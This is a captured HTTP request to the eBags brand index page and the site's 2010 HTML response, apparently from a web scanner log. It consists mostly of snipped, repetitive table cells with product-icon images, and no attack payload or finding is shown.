GET /brands/index.cfm?sub_site_id=49 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:22 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:22 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td rowspan="2" align="right" class="right_border"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/legend.gif" border="0" hspace="10"></td>
...[SNIP]...
<td height="10" colspan="2" class="rightbottomleft_border"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/spacer.gif" border="0" height="10"></td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
